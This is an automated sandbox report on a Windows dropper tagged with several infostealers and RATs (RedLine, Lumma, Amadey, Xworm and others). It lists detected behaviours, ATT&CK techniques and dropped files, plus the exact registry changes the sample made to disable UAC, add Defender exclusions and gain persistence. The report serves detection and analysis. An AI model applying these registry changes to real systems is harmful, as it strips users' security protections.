Malware Analysis Report

2024-09-11 08:43

Sample ID 240429-s43ssseb85
Target cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09
SHA256 cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09
Tags
amadey lumma redline risepro sectoprat stealc xworm zgrat @cloudytteam cheat test1234 discovery evasion infostealer persistence rat spyware stealer themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09

Threat Level: Known bad

The file cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09 was found to be: Known bad.

Malicious Activity Summary

amadey lumma redline risepro sectoprat stealc xworm zgrat @cloudytteam cheat test1234 discovery evasion infostealer persistence rat spyware stealer themida trojan

Stealc

Modifies firewall policy service

RedLine payload

RisePro

Amadey

UAC bypass

Lumma Stealer

Xworm

Windows security bypass

ZGRat

SectopRAT payload

SectopRAT

RedLine

Detect Xworm Payload

Detect ZGRat V1

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Drops file in Drivers directory

Blocklisted process makes network request

Downloads MZ/PE file

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Identifies Wine through registry keys

Reads WinSCP keys stored on the system

Windows security modification

Executes dropped EXE

Themida packer

Checks BIOS information in registry

Reads local data of messenger clients

Checks whether UAC is enabled

Enumerates connected drives

Looks up external IP address via web service

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Drops Chrome extension

Drops desktop.ini file(s)

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious behavior: LoadsDriver

Uses Task Scheduler COM API

Modifies registry class

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

System policy modification

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Scheduled Task/Job
T1053
Persistence
TA0003
Create or Modify System Process
T1543
Windows Service
T1543.003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Create or Modify System Process
T1543
Windows Service
T1543.003
Abuse Elevation Control Mechanism
T1548
Bypass User Account Control
T1548.002
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Modify Registry
T1112
Abuse Elevation Control Mechanism
T1548
Bypass User Account Control
T1548.002
Impair Defenses
T1562
Disable or Modify Tools
T1562.001
Virtualization/Sandbox Evasion
T1497
Subvert Trust Controls
T1553
Install Root Certificate
T1553.004
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Credentials in Registry
T1552.002
Discovery
TA0007
Query Registry
T1012
Virtualization/Sandbox Evasion
T1497
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-04-29 15:41

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-29 15:41

Reported

2024-04-29 15:44

Platform

win10v2004-20240419-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe"

Signatures

Amadey

trojan amadey

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\V7w4GBUasgpenxOz5JxWuHLp.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RisePro

stealer risepro

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" C:\Users\Admin\Pictures\V7w4GBUasgpenxOz5JxWuHLp.exe N/A

Xworm

trojan rat xworm

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\V7w4GBUasgpenxOz5JxWuHLp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\1000017002\dfb8c0b47f.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\DRIVERS\VBoxDrv.sys C:\Windows\System32\MsiExec.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\SET7064.tmp C:\Windows\System32\MsiExec.exe N/A
File created C:\Windows\system32\DRIVERS\SET7064.tmp C:\Windows\System32\MsiExec.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS44FE.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\1000017002\dfb8c0b47f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\V7w4GBUasgpenxOz5JxWuHLp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\1000017002\dfb8c0b47f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\V7w4GBUasgpenxOz5JxWuHLp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS40FC.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS40FC.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS44FE.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\1000017002\dfb8c0b47f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe N/A
N/A N/A C:\Users\Admin\Pictures\RZyn7DqIafXJbV2YZWLCctRp.exe N/A
N/A N/A C:\Users\Admin\Pictures\rv0CjDtwBKyi999hPegyjpUA.exe N/A
N/A N/A C:\Users\Admin\Pictures\fbYbrYobrVYR9qvSaVaTozz0.exe N/A
N/A N/A C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe N/A
N/A N/A C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\AYIMY5pgjRasql7ilmopJ53h.exe N/A
N/A N/A C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe N/A
N/A N/A C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe N/A
N/A N/A C:\Users\Admin\Pictures\V7w4GBUasgpenxOz5JxWuHLp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291542301\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291542301\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291542301\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\Pictures\LUGDqNIwCPuioSPNANHhyelx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40FC.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40FC.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe N/A
N/A N/A C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
N/A N/A C:\Users\Admin\Pictures\pii7D8Eu2OpnTZhxUVxzTrTz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe N/A
N/A N/A C:\Users\Admin\Pictures\sClcuRUxjnTR7jrczebXP6s3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44FE.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44FE.tmp\Install.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine C:\Users\Admin\1000017002\dfb8c0b47f.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe N/A
N/A N/A C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\AYIMY5pgjRasql7ilmopJ53h.exe N/A
N/A N/A C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe N/A
N/A N/A C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291542301\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291542301\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291542301\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291542301\assistant\assistant_installer.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" C:\Users\Admin\Pictures\V7w4GBUasgpenxOz5JxWuHLp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\43bad8026a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\43bad8026a.exe" C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dfb8c0b47f.exe = "C:\\Users\\Admin\\1000017002\\dfb8c0b47f.exe" C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Pictures\pii7D8Eu2OpnTZhxUVxzTrTz.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\V7w4GBUasgpenxOz5JxWuHLp.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Users\Admin\AppData\Local\Temp\7zS40FC.tmp\Install.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\V7w4GBUasgpenxOz5JxWuHLp.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.inf C:\Windows\System32\MsiExec.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS40FC.tmp\Install.exe N/A
